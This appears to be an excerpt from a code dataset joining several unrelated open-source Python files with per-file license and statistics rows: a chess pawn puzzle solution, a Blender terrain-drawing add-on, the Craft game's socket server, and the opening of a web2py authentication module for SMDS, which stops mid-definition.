ps = subprocess.Popen(cmd, stdin=stdin, stdout=stdout, stderr=open('/dev/null', 'w'))
ps.wait()
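# Hedged note (added for illustration): the loop above chains the stages
# into a shell-style pipeline, each Popen reading the previous stage's
# stdout, so the script behaves like, e.g.:
#   paste -d'^' a.txt b.txt | shuf -n 10 | sed G | sed 's/\^/\n/g'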
| apache-2.0 | -607,270,027,683,511,700 | 25.479167 | 103 | 0.630999 | false | 3.130542 | false | false | false |
lisprolog/python | save_pawns.py | 1 | 1937 | def safe_pawns(pawns):
coordinates = getCoord(pawns);
listCoordinates = coordinates[0];
listSavePositions = coordinates[1];
#print(listCoordinates);
#print(listSavePositions);
safe = checkCoord(listCoordinates, listSavePositions);
return safe
# translates the chess coordinates into digits
#
def getCoord(pawns):
testpawns = ["b4", "d4", "f4", "c3", "e3", "g5", "d2"];
# (a == 0)
alpha = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h'];
# (1 == 0)
num = ['1', '2', '3', '4', '5', '6', '7', '8'];
#print(alpha.index("a"));
coordinateList = [];
saveCandidates = [];
for elem in pawns:
#print(elem[0]);
letter = elem[0];
pos_letter = alpha.index(letter);
#print(alpha.index(letter));
#print(elem[1]);
digit = elem[1];
pos_digit = num.index(digit);
#print(num.index(digit));
two = [pos_letter, pos_digit];
coordinateList.append(two);
twoCand_One = [pos_letter - 1, pos_digit + 1];
twoCand_Two = [pos_letter + 1, pos_digit + 1];
if twoCand_One not in saveCandidates:
saveCandidates.append(twoCand_One);
if twoCand_Two not in saveCandidates:
saveCandidates.append(twoCand_Two);
#saveCandidates2 = set(saveCandidates);
twoLists = [coordinateList, saveCandidates];
print (coordinateList);
print (saveCandidates);
return twoLists;
def checkCoord(coordinates, candidates):
count = 0;
for elem in coordinates:
if elem in candidates:
count += 1;
return count;
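# Hedged worked example (added): getCoord maps "b4" to [1, 3] and records
# its guarded squares [0, 4] ("a5") and [2, 4] ("c5"); checkCoord then
# counts the pawns whose own coordinates appear among the guarded squares.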
if __name__ == '__main__':
#These "asserts" using only for self-checking and not necessary for auto-testing
assert safe_pawns({"b4", "d4", "f4", "c3", "e3", "g5", "d2"}) == 6
assert safe_pawns({"b4", "c4", "d4", "e4", "f4", "g4", "e5"}) == 1
| bsd-3-clause | 3,029,310,417,977,442,300 | 31.830508 | 84 | 0.56634 | false | 3.180624 | false | false | false |
blendit/env | src/blender/grease_pencil.py | 1 | 10818 | import bpy
import os
import sys
import subprocess
import ast
import random
script_dir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
sys.path.append(script_dir)
# Get system's python path
proc = subprocess.Popen('python3 -c "import sys; print(sys.path)"', stdout=subprocess.PIPE, shell=True)
out, err = proc.communicate()
paths = ast.literal_eval(out.decode("utf-8"))
sys.path += (paths)
from shapely.geometry import Polygon
from shapely.affinity import translate
from src.blender.blend_environment import BlendEnvironment
from src.environment import Environment
from src.landscape import Mountain, MountainImg, Vegetation
from src.model import AbstractModel
from src.feature import ImageFeature
# how to deal with this ? pencil.layers[0] = GP_Layer.001, ..., pencil.layers[n-1] = GP_Layer.00n, pencil.layers[n] = GP_Layer... (but GP Layer first one)
# nb, can change gen_name(i) in id ? maybe not...
feature_list = []
model_number_list = []
image_path_list = []
# if we put feature_list into scn, it is transformed into a read-only IDPropertyArray :'(
benv = BlendEnvironment((0, 0), (0, 0))
# could probably put this in context
def upd_enum(self, context):
print(self['MyEnum'])
def update_scale(self, context):
for (s, models) in benv.models:
for model in models:
model.scale[0] = s * context.scene.model_scaling
model.scale[1] = s * context.scene.model_scaling
model.scale[2] = s * context.scene.model_scaling
def initSceneProperties(scn):
bpy.types.Scene.model_number = bpy.props.IntProperty(name="Number of models", default=20, min=1, max=400)
scn["model_number"] = 100
bpy.types.Scene.model_scaling = bpy.props.FloatProperty(name="Scaling of models", default=0.3, min=0, update=update_scale)
scn["model_scaling"] = 0.3
bpy.types.Scene.model_path = bpy.props.StringProperty(
name="Patht to models",
description="Path to models",
default="../../models/vegetation/Pine_4m.obj",
maxlen=1024,
subtype='FILE_PATH')
scn["model_path"] = "../../models/vegetation/Pine_4m.obj"
bpy.types.Scene.image_path = bpy.props.StringProperty(
name="Patht to models",
description="Path to models",
default="../../hm.png",
maxlen=1024,
subtype='FILE_PATH')
scn["image_path"] = "../../hm.png"
myItems = [('MountainImg', 'MountainImg', 'MountainImg'),
# ('Mountain', 'Mountain', 'Mountain'),
('Vegetation', 'Vegetation', 'Vegetation'),
('Image', 'Image', 'Image'),
('Urban', 'Urban', 'Urban'),
('Water', 'Water', 'Water')]
bpy.types.Scene.MyEnum = bpy.props.EnumProperty(
items=myItems,
name="Feature choice",
update=upd_enum)
scn["myItems"] = myItems
scn['MyEnum'] = 0
scn["i"] = 0
scn["models_scale"] = 1
return
def print_points():
# print points defined using pencil
for i, pencil in enumerate(bpy.data.grease_pencil[0].layers):
print("step " + str(i))
try:
for stroke in enumerate(pencil.active_frame.strokes):
stroke_points = pencil.active_frame.strokes[0].points
for point in stroke_points:
print("\t(" + str(point.co.x) + ", " + str(point.co.y) + ", " + str(point.co.z) + ")")
except AttributeError:
print("\tempty")
def gen_name(i):
if(i == 0):
name = "GP_Layer"
else:
name = "GP_Layer." + "{0:0=3d}".format(i)
return name
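# Hedged illustration (added): gen_name mirrors Blender's duplicate-name
# numbering for grease pencil layers, e.g. gen_name(0) == "GP_Layer" and
# gen_name(3) == "GP_Layer.003".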
def change_color(i):
name = gen_name(i)
bpy.data.grease_pencil["GPencil"].layers[name].fill_color = (random.random(), random.random(), random.random())
print("colors " + str(bpy.data.grease_pencil["GPencil"].layers[name].fill_color[0]) +
" " + str(bpy.data.grease_pencil["GPencil"].layers[name].fill_color[1]) +
" " + str(bpy.data.grease_pencil["GPencil"].layers[name].fill_color[2]))
bpy.data.grease_pencil["GPencil"].layers[name].fill_alpha = 1
def dist(a, b):
return (a[0] - b[0])**2 + (a[1] - b[1])**2
def gen_feature(feature_name, model_number, image_path, shape, transl, scaling, scn):
print("Called gen_feature @ %s" % feature_name)
# let's first translate our feature.
    ip = Polygon(list(shape))
p = translate(ip, xoff=transl[0], yoff=transl[1])
if(feature_name == "Mountain"):
center_z = 0
center_pos = p.centroid.coords[0]
rd = int((max([dist(x, center_pos) for x in p.exterior.coords]) / 2) ** 0.5)
print("Radius = %d" % rd)
print("Center = %d, %d" % (center_pos[0], center_pos[1]))
return Mountain(rd, center_z, center_pos)
elif(feature_name == "MountainImg"):
center_z = 0
center_pos = p.bounds[0:2]
print("Center = %d, %d" % (center_pos[0], center_pos[1]))
return MountainImg(p, center=center_pos)
elif(feature_name == "Roads"):
pass
elif(feature_name == "Image"):
f = ImageFeature(image_path)
f.shape = p
return f
elif(feature_name == "Vegetation"):
for a in p.exterior.coords:
print(a)
return Vegetation(p, model=AbstractModel(scn["model_path"], 0.02, (0, 0)), tree_number=model_number)
elif(feature_name == "Urban"):
pass
elif(feature_name == "WaterArea"):
pass
elif(feature_name == "River"):
pass
class OBJECT_OT_ToolsButton(bpy.types.Operator):
bl_idname = "drawenv.execute"
bl_label = "Draw something"
def execute(self, context):
self.report({'INFO'}, "starting drawing")
bpy.ops.view3d.viewnumpad(type='TOP', align_active=False)
bpy.ops.gpencil.draw('INVOKE_REGION_WIN', mode="DRAW_POLY")
change_color(context.scene["i"])
return {'FINISHED'}
class OBJECT_OT2_ToolsButton(bpy.types.Operator):
bl_idname = "drawenv.stop"
bl_label = "Done"
def execute(self, context):
scn = context.scene
self.report({'INFO'}, "stopping drawing")
# We add this new feature
# We should translate everything, here or when exporting the env
# Idea : find bounding box, and translate 2 times...
# shape_2d = [(p.co.x, p.co.y) for p in bpy.data.grease_pencil[0].layers[scn["i"]].active_frame.strokes[0].points]
# feature_list.append(gen_feature(scn["myItems"][scn["MyEnum"]][0], shape_2d))
feature_list.append(scn["myItems"][scn["MyEnum"]][0])
model_number_list.append(scn["model_number"])
image_path_list.append(scn["image_path"])
scn["i"] += 1
bpy.ops.gpencil.layer_add()
return {'FINISHED'}
class OBJECT_OT3_ToolsButton(bpy.types.Operator):
bl_idname = "drawenv.print"
bl_label = "Print points"
def execute(self, context):
print_points()
return {'FINISHED'}
class OBJECT_OT4_ToolsButton(bpy.types.Operator):
bl_idname = "drawenv.hide"
bl_label = "Hide/unhide gpencil"
def execute(self, context):
scn = context.scene
for i in range(scn["i"]):
bpy.data.grease_pencil[0].layers[i].hide = not bpy.data.grease_pencil["GPencil"].layers[i].hide
return {'FINISHED'}
class OBJECT_OT5_ToolsButton(bpy.types.Operator):
bl_idname = "drawenv.gen"
bl_label = "Generate environment"
def execute(self, context):
global benv
scn = context.scene
# bpy.ops.view3d.viewnumpad(type='CAMERA', align_active=False)
        # scaling = max(bb[2] - bb[0], bb[3] - bb[1]) / 28
scaling = 1
shapes = [[] for i in range(scn["i"])]
for i in range(scn["i"]):
try:
for p in bpy.data.grease_pencil[0].layers[i].active_frame.strokes[0].points:
shapes[i].append((scaling * p.co.x, - scaling * p.co.y))
except AttributeError:
pass
bb = bounds(shapes[0])
for shape in shapes[1:]:
if(shape != []):
s = bounds(shape)
bb = (min(bb[0], s[0]), min(bb[1], s[1]), max(bb[2], s[2]), max(bb[3], s[3]))
res_x = int(bb[2] - bb[0])
res_y = int(bb[3] - bb[1])
print("Res x %d; res y %d" % (res_x, res_y))
my_features = [gen_feature(feature_list[i], model_number_list[i], image_path_list[i], shapes[i], (-bb[0], -bb[1]), scaling, scn) for i in range(len(shapes)) if shapes[i] != []]
env = Environment(my_features, x=res_x, y=res_y)
benv = BlendEnvironment((-bb[0], -bb[1]), (res_x, res_y))
# scn["models_scale"] = 1 / (max(bb[2] - bb[0], bb[3] - bb[1]) // (2*scaling))
benv.export_img(env, 2)
for i in range(scn["i"]):
bpy.data.grease_pencil[0].layers[i].hide = not bpy.data.grease_pencil["GPencil"].layers[i].hide
return {'FINISHED'}
def bounds(point_list):
min_x, min_y = point_list[0]
max_x, max_y = point_list[0]
for p in point_list[1:]:
min_x = min(min_x, p[0])
max_x = max(max_x, p[0])
min_y = min(min_y, p[1])
max_y = max(max_y, p[1])
return (min_x, min_y, max_x, max_y)
class FeaturePanel(bpy.types.Panel):
bl_category = "Environment"
bl_label = "Feature choice"
bl_space_type = "VIEW_3D"
bl_region_type = "TOOLS"
def draw(self, context):
layout = self.layout
scn = context.scene
layout.prop(scn, 'MyEnum')
class ToolsPanel(bpy.types.Panel):
bl_category = "Environment"
bl_label = "Environment panel"
bl_space_type = "VIEW_3D"
bl_region_type = "TOOLS"
def draw(self, context):
layout = self.layout
scn = context.scene
layout.operator("drawenv.execute")
layout.operator("drawenv.stop")
layout.operator("drawenv.gen")
layout.operator("drawenv.print")
layout.operator("drawenv.hide")
class EnvParamPanel(bpy.types.Panel):
bl_category = "Environment"
bl_label = "Model parameters"
bl_space_type = "VIEW_3D"
bl_region_type = "TOOLS"
def draw(self, context):
layout = self.layout
scn = context.scene
layout.prop(scn, 'model_number')
layout.prop(scn, 'model_scaling')
layout.prop(scn, 'model_path')
class ImgParamPanel(bpy.types.Panel):
bl_category = "Environment"
bl_label = "Image parameters"
bl_space_type = "VIEW_3D"
bl_region_type = "TOOLS"
def draw(self, context):
layout = self.layout
scn = context.scene
layout.prop(scn, 'image_path')
if __name__ == "__main__":
initSceneProperties(bpy.context.scene)
bpy.utils.register_module(__name__)
| gpl-3.0 | -8,310,356,213,299,858,000 | 33.784566 | 184 | 0.592808 | false | 3.124783 | false | false | false |
mynameisfashanu/Craft | server.py | 1 | 11016 | from math import floor
import Queue
import SocketServer
import datetime
import random
import re
import sqlite3
import sys
import threading
import time
import traceback
HOST = '0.0.0.0'
PORT = 4080
CHUNK_SIZE = 32
BUFFER_SIZE = 1024
SPAWN_POINT = (0, 0, 0, 0, 0)
DB_PATH = 'craft.db'
COMMIT_INTERVAL = 5
YOU = 'U'
BLOCK = 'B'
CHUNK = 'C'
POSITION = 'P'
DISCONNECT = 'D'
TALK = 'T'
KEY = 'K'
def log(*args):
now = datetime.datetime.utcnow()
print now, ' '.join(map(str, args))
def chunked(x):
return int(floor(round(x) / CHUNK_SIZE))
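# Hedged examples (added): with CHUNK_SIZE = 32, chunked(0) == 0,
# chunked(31.6) == 1 (the coordinate is rounded to 32 first), and
# chunked(-1) == -1, since floor keeps negative coordinates in the
# chunk below zero.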
class Server(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
allow_reuse_address = True
daemon_threads = True
class Handler(SocketServer.BaseRequestHandler):
def setup(self):
self.queue = Queue.Queue()
self.running = True
self.start()
def handle(self):
model = self.server.model
model.enqueue(model.on_connect, self)
try:
buf = []
while True:
data = self.request.recv(BUFFER_SIZE)
if not data:
break
buf.extend(data.replace('\r', ''))
while '\n' in buf:
index = buf.index('\n')
line = ''.join(buf[:index])
buf = buf[index + 1:]
model.enqueue(model.on_data, self, line)
finally:
model.enqueue(model.on_disconnect, self)
def finish(self):
self.running = False
def start(self):
thread = threading.Thread(target=self.run)
thread.setDaemon(True)
thread.start()
def run(self):
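        # drain the outgoing queue in batches: block up to 5 seconds for
        # the first item, then greedily collect everything pending so the
        # whole batch is flushed with a single sendall()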
while self.running:
try:
buf = []
try:
buf.append(self.queue.get(timeout=5))
try:
while True:
buf.append(self.queue.get(False))
except Queue.Empty:
pass
except Queue.Empty:
continue
data = ''.join(buf)
self.request.sendall(data)
except Exception:
self.request.close()
raise
def send_raw(self, data):
if data:
self.queue.put(data)
def send(self, *args):
data = '%s\n' % ','.join(map(str, args))
#log('SEND', self.client_id, data[:-1])
self.send_raw(data)
class Model(object):
def __init__(self):
self.clients = []
self.queue = Queue.Queue()
self.commands = {
CHUNK: self.on_chunk,
BLOCK: self.on_block,
POSITION: self.on_position,
TALK: self.on_talk,
}
self.patterns = [
(re.compile(r'^/nick(?:\s+(\S+))?$'), self.on_nick),
(re.compile(r'^/spawn$'), self.on_spawn),
(re.compile(r'^/goto(?:\s+(\S+))?$'), self.on_goto),
(re.compile(r'^/pq\s+(-?[0-9]+)\s*,?\s*(-?[0-9]+)$'), self.on_pq),
(re.compile(r'^/help$'), self.on_help),
(re.compile(r'^/players$'), self.on_players),
]
def start(self):
thread = threading.Thread(target=self.run)
thread.setDaemon(True)
thread.start()
def run(self):
self.connection = sqlite3.connect(DB_PATH)
self.create_tables()
self.commit()
while True:
try:
if time.time() - self.last_commit > COMMIT_INTERVAL:
self.commit()
self.dequeue()
except Exception:
traceback.print_exc()
def enqueue(self, func, *args, **kwargs):
self.queue.put((func, args, kwargs))
def dequeue(self):
try:
func, args, kwargs = self.queue.get(timeout=5)
func(*args, **kwargs)
except Queue.Empty:
pass
def execute(self, *args, **kwargs):
return self.connection.execute(*args, **kwargs)
def commit(self):
self.last_commit = time.time()
self.connection.commit()
def create_tables(self):
queries = [
'create table if not exists block ('
' p int not null,'
' q int not null,'
' x int not null,'
' y int not null,'
' z int not null,'
' w int not null'
');',
'create index if not exists block_xyz_idx on block (x, y, z);',
'create unique index if not exists block_pqxyz_idx on '
' block (p, q, x, y, z);',
]
for query in queries:
self.execute(query)
def next_client_id(self):
result = 1
client_ids = set(x.client_id for x in self.clients)
while result in client_ids:
result += 1
return result
def on_connect(self, client):
client.client_id = self.next_client_id()
client.nick = 'player%d' % client.client_id
log('CONN', client.client_id, *client.client_address)
client.position = SPAWN_POINT
self.clients.append(client)
client.send(YOU, client.client_id, *client.position)
client.send(TALK, 'Welcome to Craft!')
client.send(TALK, 'Type "/help" for chat commands.')
self.send_position(client)
self.send_positions(client)
self.send_talk('%s has joined the game.' % client.nick)
def on_data(self, client, data):
#log('RECV', client.client_id, data)
args = data.split(',')
command, args = args[0], args[1:]
if command in self.commands:
func = self.commands[command]
func(client, *args)
def on_disconnect(self, client):
log('DISC', client.client_id, *client.client_address)
self.clients.remove(client)
self.send_disconnect(client)
self.send_talk('%s has disconnected from the server.' % client.nick)
def on_chunk(self, client, p, q, key=0):
p, q, key = map(int, (p, q, key))
query = (
'select rowid, x, y, z, w from block where '
'p = :p and q = :q and rowid > :key;'
)
rows = self.execute(query, dict(p=p, q=q, key=key))
max_rowid = 0
for rowid, x, y, z, w in rows:
client.send(BLOCK, p, q, x, y, z, w)
max_rowid = max(max_rowid, rowid)
if max_rowid:
client.send(KEY, p, q, max_rowid)
def on_block(self, client, x, y, z, w):
x, y, z, w = map(int, (x, y, z, w))
if y <= 0 or y > 255 or w < 0 or w > 11:
return
p, q = chunked(x), chunked(z)
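        # blocks on a chunk border are mirrored into the neighboring
        # chunk with a negated block type, so clients that have loaded
        # either chunk see a consistent boundary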
query = (
'insert or replace into block (p, q, x, y, z, w) '
'values (:p, :q, :x, :y, :z, :w);'
)
self.execute(query, dict(p=p, q=q, x=x, y=y, z=z, w=w))
self.send_block(client, p, q, x, y, z, w)
if chunked(x - 1) != p:
self.execute(query, dict(p=p - 1, q=q, x=x, y=y, z=z, w=-w))
self.send_block(client, p - 1, q, x, y, z, -w)
if chunked(x + 1) != p:
self.execute(query, dict(p=p + 1, q=q, x=x, y=y, z=z, w=-w))
self.send_block(client, p + 1, q, x, y, z, -w)
if chunked(z - 1) != q:
self.execute(query, dict(p=p, q=q - 1, x=x, y=y, z=z, w=-w))
self.send_block(client, p, q - 1, x, y, z, -w)
if chunked(z + 1) != q:
self.execute(query, dict(p=p, q=q + 1, x=x, y=y, z=z, w=-w))
self.send_block(client, p, q + 1, x, y, z, -w)
def on_position(self, client, x, y, z, rx, ry):
x, y, z, rx, ry = map(float, (x, y, z, rx, ry))
client.position = (x, y, z, rx, ry)
self.send_position(client)
def on_talk(self, client, *args):
text = ','.join(args)
if text.startswith('/'):
for pattern, func in self.patterns:
match = pattern.match(text)
if match:
func(client, *match.groups())
break
else:
client.send(TALK, 'Unrecognized command: "%s"' % text)
else:
self.send_talk('%s> %s' % (client.nick, text))
def on_nick(self, client, nick=None):
if nick is None:
client.send(TALK, 'Your nickname is %s' % client.nick)
else:
self.send_talk('%s is now known as %s' % (client.nick, nick))
client.nick = nick
def on_spawn(self, client):
client.position = SPAWN_POINT
client.send(YOU, client.client_id, *client.position)
self.send_position(client)
def on_goto(self, client, nick=None):
if nick is None:
clients = [x for x in self.clients if x != client]
other = random.choice(self.clients) if clients else None
else:
nicks = dict((client.nick, client) for client in self.clients)
other = nicks.get(nick)
if other:
client.position = other.position
client.send(YOU, client.client_id, *client.position)
self.send_position(client)
def on_pq(self, client, p, q):
p, q = map(int, (p, q))
if abs(p) > 1000 or abs(q) > 1000:
return
client.position = (p * CHUNK_SIZE, 0, q * CHUNK_SIZE, 0, 0)
client.send(YOU, client.client_id, *client.position)
self.send_position(client)
def on_help(self, client):
client.send(TALK, 'Type "t" to chat with other players.')
client.send(TALK, 'Type "/" to start typing a command.')
client.send(TALK,
'Commands: /goto [NAME], /help, /nick [NAME], /players, /spawn')
def on_players(self, client):
client.send(TALK,
'Players: %s' % ', '.join(x.nick for x in self.clients))
def send_positions(self, client):
for other in self.clients:
if other == client:
continue
client.send(POSITION, other.client_id, *other.position)
def send_position(self, client):
for other in self.clients:
if other == client:
continue
other.send(POSITION, client.client_id, *client.position)
def send_disconnect(self, client):
for other in self.clients:
if other == client:
continue
other.send(DISCONNECT, client.client_id)
def send_block(self, client, p, q, x, y, z, w):
for other in self.clients:
if other == client:
continue
other.send(BLOCK, p, q, x, y, z, w)
def send_talk(self, text):
for client in self.clients:
client.send(TALK, text)
def main():
host, port = HOST, PORT
if len(sys.argv) > 1:
host = sys.argv[1]
if len(sys.argv) > 2:
port = int(sys.argv[2])
log('SERV', host, port)
model = Model()
model.start()
server = Server((host, port), Handler)
server.model = model
server.serve_forever()
if __name__ == '__main__':
main()
| mit | -343,538,699,915,906,300 | 34.307692 | 78 | 0.51398 | false | 3.473983 | false | false | false |
jcnelson/syndicate | old/md-service/SMDS/web2py/extras/SMDS_auth.py | 2 | 29953 | """
SMDS authentication module for web2py.
Parts borrowed from /usr/share/python-support/python-gluon/gluon/tools.py
"""
import sys
sys.path.append( "/usr/share/syndicate_md" )
sys.path.append( "/usr/share/python-support/python-gluon/" )
import base64
import cPickle
import datetime
import thread
import logging
import sys
import os
import re
import time
import copy
import smtplib
import urllib
import urllib2
import Cookie
import cStringIO
from email import MIMEBase, MIMEMultipart, MIMEText, Encoders, Header, message_from_string
from gluon.contenttype import contenttype
from gluon.storage import Storage, StorageList, Settings, Messages
from gluon.utils import web2py_uuid
from gluon import *
from gluon.fileutils import read_file
from gluon.html import *
import gluon.serializers
import gluon.contrib.simplejson as simplejson
from SMDS.mdapi import MDAPI
from SMDS.auth import auth_user_from_email, auth_password_check
from SMDS.user import *
from SMDS.web2py.extras import SMDS_validators
import SMDS.logger as logger
from gluon.tools import Auth as GluonAuth
logger.init( "/tmp/SMDS_Auth.log" )
DEFAULT = lambda: None
def callback(actions,form,tablename=None):
if actions:
if tablename and isinstance(actions,dict):
actions = actions.get(tablename, [])
if not isinstance(actions,(list, tuple)):
actions = [actions]
[action(form) for action in actions]
def validators(*a):
b = []
for item in a:
if isinstance(item, (list, tuple)):
b = b + list(item)
else:
b.append(item)
return b
def call_or_redirect(f,*args):
if callable(f):
redirect(f(*args))
else:
redirect(f)
def dict_to_Rows( my_dict ):
extra_dict = {'_extra': my_dict}
row = Row( extra_dict )
rows = Rows( records=[row], colnames=list(my_dict.keys()), compact=False )
return rows
class SMDS_Auth( GluonAuth ):
"""
web2py Authentication module for SMDS
"""
def __init__(self, api):
"""
auth=Auth(globals(), db)
- environment is there for legacy but unused (awful)
- db has to be the database where to create tables for authentication
"""
controller = 'default'
cas_provider = None
self.db = None
self.environment = current
request = current.request
session = current.session
auth = session.auth
if auth and auth.last_visit and auth.last_visit + \
datetime.timedelta(days=0, seconds=auth.expiration) > request.now:
self.user = auth.user
# this is a trick to speed up sessions
if (request.now - auth.last_visit).seconds > (auth.expiration/10):
auth.last_visit = request.now
else:
self.user = None
session.auth = None
settings = self.settings = Settings()
# ## what happens after login?
# ## what happens after registration?
settings.hideerror = False
settings.cas_domains = [request.env.http_host]
settings.cas_provider = cas_provider
settings.extra_fields = {}
settings.actions_disabled = []
settings.reset_password_requires_verification = False
settings.registration_requires_verification = False
settings.registration_requires_approval = True
settings.alternate_requires_registration = False
settings.create_user_groups = False
settings.controller = controller
settings.login_url = self.url('user', args='login')
settings.logged_url = self.url('user', args='profile')
settings.download_url = self.url('download')
settings.mailer = None
settings.login_captcha = None
settings.register_captcha = None
settings.retrieve_username_captcha = None
settings.retrieve_password_captcha = None
settings.captcha = None
settings.expiration = 3600 # one hour
settings.long_expiration = 3600*30*24 # one month
settings.remember_me_form = False
settings.allow_basic_login = False
settings.allow_basic_login_only = False
settings.on_failed_authorization = \
self.url('user',args='not_authorized')
settings.on_failed_authentication = lambda x: redirect(x)
settings.formstyle = 'table3cols'
settings.label_separator = ': '
# ## table names to be used
settings.password_field = 'password'
settings.table_user_name = 'auth_user'
settings.table_group_name = 'auth_group'
settings.table_membership_name = 'auth_membership'
settings.table_permission_name = 'auth_permission'
settings.table_event_name = 'auth_event'
settings.table_cas_name = 'auth_cas'
# ## if none, they will be created
settings.table_user = None
settings.table_group = None
settings.table_membership = None
settings.table_permission = None
settings.table_event = None
settings.table_cas = None
# ##
settings.showid = False
# ## these should be functions or lambdas
settings.login_next = self.url('index')
settings.login_onvalidation = []
settings.login_onaccept = []
settings.login_methods = [self]
settings.login_form = self
settings.login_email_validate = True
settings.login_userfield = "username"
settings.logout_next = self.url('index')
settings.logout_onlogout = lambda x: None
settings.register_next = self.url('index')
settings.register_onvalidation = []
settings.register_onaccept = []
settings.register_fields = None
settings.verify_email_next = self.url('user', args='login')
settings.verify_email_onaccept = []
settings.profile_next = self.url('index')
settings.profile_onvalidation = []
settings.profile_onaccept = []
settings.profile_fields = None
settings.retrieve_username_next = self.url('index')
settings.retrieve_password_next = self.url('index')
settings.request_reset_password_next = self.url('user', args='login')
settings.reset_password_next = self.url('user', args='login')
settings.change_password_next = self.url('index')
settings.change_password_onvalidation = []
settings.change_password_onaccept = []
settings.retrieve_password_onvalidation = []
settings.reset_password_onvalidation = []
settings.hmac_key = None
settings.lock_keys = True
# ## these are messages that can be customized
messages = self.messages = Messages(current.T)
messages.login_button = 'Login'
messages.register_button = 'Register'
messages.password_reset_button = 'Request reset password'
messages.password_change_button = 'Change password'
messages.profile_save_button = 'Save profile'
messages.submit_button = 'Submit'
messages.verify_password = 'Verify Password'
messages.delete_label = 'Check to delete:'
messages.function_disabled = 'Function disabled'
messages.access_denied = 'Insufficient privileges'
messages.registration_verifying = 'Registration needs verification'
messages.registration_pending = 'Registration is pending approval'
messages.login_disabled = 'Login disabled by administrator'
messages.logged_in = 'Logged in'
messages.email_sent = 'Email sent'
messages.unable_to_send_email = 'Unable to send email'
messages.email_verified = 'Email verified'
messages.logged_out = 'Logged out'
messages.registration_successful = 'Registration successful'
messages.invalid_email = 'Invalid email'
messages.unable_send_email = 'Unable to send email'
messages.invalid_login = 'Invalid login'
messages.invalid_user = 'Invalid user'
messages.invalid_password = 'Invalid password'
messages.is_empty = "Cannot be empty"
messages.mismatched_password = "Password fields don't match"
messages.verify_email = 'A user wishes to join Syndicate.\nDetails:\n Username: %(username)s\n Email: %(email)s'
messages.verify_email_subject = 'Email verification'
messages.username_sent = 'Your username was emailed to you'
messages.new_password_sent = 'A new password was emailed to you'
messages.password_changed = 'Password changed'
messages.retrieve_username = 'Your username is: %(username)s'
messages.retrieve_username_subject = 'Username retrieve'
messages.retrieve_password = 'Your password is: %(password)s'
messages.retrieve_password_subject = 'Password retrieve'
messages.reset_password = \
'Click on the link http://...reset_password/%(key)s to reset your password'
messages.reset_password_subject = 'Password reset'
messages.invalid_reset_password = 'Invalid reset password'
messages.profile_updated = 'Profile updated'
messages.new_password = 'New password'
messages.old_password = 'Old password'
messages.group_description = \
'Group uniquely assigned to user %(id)s'
messages.register_log = 'User %(id)s Registered'
messages.login_log = 'User %(id)s Logged-in'
messages.login_failed_log = None
messages.logout_log = 'User %(id)s Logged-out'
messages.profile_log = 'User %(id)s Profile updated'
messages.verify_email_log = 'User %(id)s Verification email sent'
messages.retrieve_username_log = 'User %(id)s Username retrieved'
messages.retrieve_password_log = 'User %(id)s Password retrieved'
messages.reset_password_log = 'User %(id)s Password reset'
messages.change_password_log = 'User %(id)s Password changed'
messages.add_group_log = 'Group %(group_id)s created'
messages.del_group_log = 'Group %(group_id)s deleted'
messages.add_membership_log = None
messages.del_membership_log = None
messages.has_membership_log = None
messages.add_permission_log = None
messages.del_permission_log = None
messages.has_permission_log = None
messages.impersonate_log = 'User %(id)s is impersonating %(other_id)s'
messages.label_first_name = 'First name'
messages.label_last_name = 'Last name'
messages.label_username = 'Username'
messages.label_email = 'E-mail'
messages.label_password = 'Password'
messages.label_registration_key = 'Registration key'
messages.label_reset_password_key = 'Reset Password key'
messages.label_registration_id = 'Registration identifier'
messages.label_role = 'Role'
messages.label_description = 'Description'
messages.label_user_id = 'User ID'
messages.label_group_id = 'Group ID'
messages.label_name = 'Name'
messages.label_table_name = 'Table name'
messages.label_record_id = 'Record ID'
messages.label_time_stamp = 'Timestamp'
messages.label_client_ip = 'Client IP'
messages.label_origin = 'Origin'
messages.label_remember_me = "Remember me (for 30 days)"
messages['T'] = current.T
messages.verify_password_comment = 'please input your password again'
messages.lock_keys = True
self.user = None
self.api = api
self.maint_email = api.config.MD_MAIL_SUPPORT_ADDRESS
# disable stuff for now
settings.actions_disabled.append('retrieve_username')
settings.actions_disabled.append('retrieve_password')
settings.actions_disabled.append('request_reset_password')
settings.actions_disabled.append('profile')
settings.actions_disabled.append('change_password')
def _get_user_id(self):
"accessor for auth.user_id"
return (self.user and self.user.get('user_id')) or None
user_id = property(_get_user_id, doc="user.id or None")
def _HTTP(self, *a, **b):
"""
only used in lambda: self._HTTP(404)
"""
raise HTTP(*a, **b)
def __call__(self):
"""
usage:
def authentication(): return dict(form=auth())
"""
request = current.request
args = request.args
if not args:
redirect(self.url(args='login',vars=request.vars))
elif args[0] in self.settings.actions_disabled:
raise HTTP(404)
"""
if args[0] in ('login','logout','register','verify_email',
'retrieve_username','retrieve_password',
'reset_password','request_reset_password',
'change_password','profile','groups',
'impersonate','not_authorized'):
"""
if args[0] in ('login','logout','register','not_authorized'):
return getattr(self,args[0])()
else:
raise HTTP(404)
def navbar(self,prefix='Welcome',action=None):
"""
Create a pretty navigation bar
"""
try:
user = None
session = current.session
if session.auth:
user = session.auth['user']
request = current.request
T = current.T
if isinstance(prefix,str):
prefix = T(prefix)
if not action:
action=URL(request.application,request.controller,'user')
if prefix:
prefix = prefix.strip()+' '
if user:
logout=A(T('logout'),_href=action+'/logout')
profile=A(T('profile'),_href=action+'/profile')
password=A(T('password'),_href=action+'/change_password')
bar = SPAN(prefix, user['username'],' [ ', logout, ']',_class='auth_navbar')
if not 'profile' in self.settings.actions_disabled:
bar.insert(4, ' | ')
bar.insert(5, profile)
if not 'change_password' in self.settings.actions_disabled:
bar.insert(-1, ' | ')
bar.insert(-1, password)
else:
login=A(T('login'),_href=action+'/login')
register=A(T('register'),_href=action+'/register')
retrieve_username=A(T('forgot username?'),
_href=action+'/retrieve_username')
lost_password=A(T('lost password?'),
_href=action+'/request_reset_password')
bar = SPAN('[ ',login,' ]',_class='auth_navbar')
if not 'register' in self.settings.actions_disabled:
bar.insert(2, ' | ')
bar.insert(3, register)
if 'username' in User.public_fieldnames and not 'retrieve_username' in self.settings.actions_disabled:
bar.insert(-1, ' | ')
bar.insert(-1, retrieve_username)
if not 'request_reset_password' in self.settings.actions_disabled:
bar.insert(-1, ' | ')
bar.insert(-1, lost_password)
return bar
except Exception, e:
logger.exception(e, "Navbar error")
logger.flush()
def define_tables(self, username=None, migrate=None, fake_migrate=None):
